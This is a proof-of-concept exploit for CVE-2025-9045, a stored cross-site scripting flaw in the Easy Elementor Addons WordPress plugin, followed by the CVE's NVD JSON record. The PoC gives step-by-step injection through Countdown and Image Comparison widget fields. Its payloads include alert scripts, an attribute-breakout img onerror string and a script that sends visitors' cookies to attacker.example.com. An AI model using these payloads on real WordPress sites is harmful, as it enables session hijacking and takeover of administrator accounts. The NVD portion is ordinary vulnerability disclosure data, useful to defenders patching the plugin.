CVE-2025-9045

<!-- PoC for CVE-2025-9045: Stored XSS in Easy Elementor Addons Plugin Affected: Easy Elementor Addons <= 2.2.9 Required: Contributor or higher WordPress user role --> <!-- Step 1: Login as Contributor and create/edit a page using Elementor --> <!-- Step 2: Add the Countdown widget or Image Comparison widget --> <!-- Step 3: Inject malicious payload into vulnerable widget parameters --> <!-- Payload example for Countdown widget (inserted into label/title fields): --> <script>alert('XSS-CVE-2025-9045')</script> <!-- Or more sophisticated payload for cookie stealing: --> <script> var img = new Image(); img.src = 'https://attacker.example.com/steal?cookie=' + document.cookie; </script> <!-- Payload example for Image Comparison widget (inserted into caption/label fields): --> "><img src=x onerror=alert(document.domain)> <!-- The malicious payload will be stored in the WordPress database as part of the page metadata. When any user (including administrators) visits the infected page, the script will execute in their browser context. --> <!-- Example of the vulnerable widget shortcode/data stored in DB: --> { "_elementor_data": "[{\"id\":\"abc123\",\"elType\":\"widget\",\"widgetType\":\"countdown\",\"settings\":{\"label_days\":\"<script>alert('XSS')</script>\"}}]" }

{"cve": {"id": "CVE-2025-9045", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:45.340", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Easy Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widget parameters in versions less than, or equal to, 2.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.2.8/modules/countdown/widgets/countdown.php#L864", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.2.8/modules/countdown/widgets/countdown.php#L868", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.2.8/modules/countdown/widgets/countdown.php#L871", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.2.8/modules/image-comparison/widgets/image-comparison.php#L376", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.2.8/modules/image-comparison/widgets/image-comparison.php#L377", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.3.0/modules/countdown/widgets/countdown.php#L871", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.3.0/modules/image-comparison/widgets/image-comparison.php#L376", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/08640d56-fc76-4062-ab08-19415ad77e5e?source=cve", "source": "[email protected]"}]}}